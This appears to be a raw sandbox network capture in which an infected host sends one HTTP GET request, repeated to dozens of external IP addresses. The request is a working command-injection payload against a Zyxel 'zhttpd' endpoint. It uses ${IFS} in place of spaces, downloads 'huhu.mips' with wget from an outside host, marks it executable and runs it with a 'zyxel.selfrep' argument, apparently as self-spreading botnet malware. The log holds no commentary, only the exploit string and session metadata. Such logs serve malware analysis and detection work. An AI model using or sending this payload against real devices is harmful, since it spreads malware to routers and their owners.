                                                Jan 29, 2024 07:07:48.347774029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4422192.168.2.2355504190.47.180.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347805023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4423192.168.2.233987468.227.195.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347834110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4424192.168.2.235377881.69.78.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347892046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4425192.168.2.2360374150.136.90.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347908974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4426192.168.2.2340316199.158.138.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347970963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4427192.168.2.2343690132.124.250.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348001957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4428192.168.2.236084698.145.172.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348036051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4429192.168.2.234808844.2.121.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348094940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4430192.168.2.2355594189.97.235.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348130941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4431192.168.2.2334640102.35.247.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348159075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4432192.168.2.234514867.36.213.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348213911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4433192.168.2.235520632.142.106.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348249912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4434192.168.2.2340450206.121.148.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348290920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4435192.168.2.233390486.137.41.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348310947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4436192.168.2.235033491.35.101.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348349094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4437192.168.2.2333446137.94.106.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348402977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4438192.168.2.233928862.33.227.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348449945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4439192.168.2.234185860.164.181.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348488092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4440192.168.2.2334178106.167.189.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348542929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4441192.168.2.2344700124.94.191.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348577976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4442192.168.2.235998223.217.141.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348606110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4443192.168.2.2358320109.119.155.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348643064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4444192.168.2.235219635.42.243.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348670959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4445192.168.2.236081241.178.243.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348726988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4446192.168.2.2356708141.232.27.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348768950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4447192.168.2.234960234.191.10.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348813057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4448192.168.2.234710460.132.200.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348839045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4449192.168.2.234494064.252.199.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348876953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4450192.168.2.2351594206.52.126.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348896027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4451192.168.2.2335264124.163.199.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348942041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4452192.168.2.2347802110.32.60.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.348957062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4453192.168.2.2337156115.37.244.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349003077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4454192.168.2.235308061.170.120.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349057913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4455192.168.2.233410825.199.235.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349076033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4456192.168.2.234160863.53.126.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349126101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4457192.168.2.2352100162.62.156.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349167109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4458192.168.2.2357464155.124.145.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349206924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4459192.168.2.2350308129.0.135.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349253893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4460192.168.2.2336488221.36.35.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349293947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4461192.168.2.233807451.206.84.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349317074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4462192.168.2.2349846198.96.28.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349351883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4463192.168.2.2344158103.144.153.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349380970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4464192.168.2.235675627.155.113.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349438906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4465192.168.2.2335626200.11.252.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349456072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4466192.168.2.2334574207.119.178.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349523067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4467192.168.2.2335546203.180.67.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349571943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4468192.168.2.234881848.192.207.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349580050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4469192.168.2.233626266.110.18.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349620104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4470192.168.2.2340780191.69.52.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349662066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4471192.168.2.2351068165.176.2.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349700928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4472192.168.2.2335432154.127.122.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349737883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4473192.168.2.2340728173.82.11.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349766016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4474192.168.2.2337144150.133.249.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349843025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4475192.168.2.2344646152.60.96.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349854946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4476192.168.2.2344830114.46.188.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349903107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4477192.168.2.235015439.208.220.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349960089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4478192.168.2.2339454111.188.217.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349962950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4479192.168.2.2334416163.197.5.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.349963903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4480192.168.2.2348068121.162.180.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353509903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4481192.168.2.2347994146.106.201.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353524923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4482192.168.2.234452690.231.126.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353602886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4483192.168.2.233390486.35.7.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353637934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4484192.168.2.2339368198.172.82.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353662014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4485192.168.2.2350012103.245.158.113443
                                                TimestampBytes transferredDirectionData
